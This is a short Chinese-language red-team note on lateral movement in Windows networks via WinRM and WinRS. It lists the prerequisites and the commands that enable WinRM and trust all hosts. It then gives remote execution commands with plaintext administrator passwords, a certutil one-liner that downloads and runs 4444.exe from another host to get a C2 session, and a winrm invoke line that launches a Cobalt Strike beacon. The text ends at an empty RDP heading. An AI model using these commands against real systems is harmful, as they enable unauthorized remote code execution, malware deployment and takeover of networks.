WinRM & WinRS

windows 远程管理，一种允许管理员远程执行系统管理控制任务的服务

winRS 是内置命令行工具，用于远程连接与执行 WinRM 的服务器并执行大多数 cmd

利用条件

1、2012 之前需收到那个开启 WinRM，2012之后默认开启

2、防火墙开放时5986、5985

开启命令

winrm quickconfig -q

winrm set winrm/config/Client @{TrustedHosts="*"}

操作手法

1、端口扫描 5985，发现可操作主机

2、连接执行

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami

winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3、上线C2

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"

4、CS 内置插件

右键 -> 横向移动 -> winrm、winrm64

实验失败，被杀了

5、其他解决：通过winrm.cmd来进行命令执行

shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe c:/beacon.exe"} -r:192.168.159.15 -u:win-3j3bdtqnp64\administrator -p:admin@123

RDP

.................................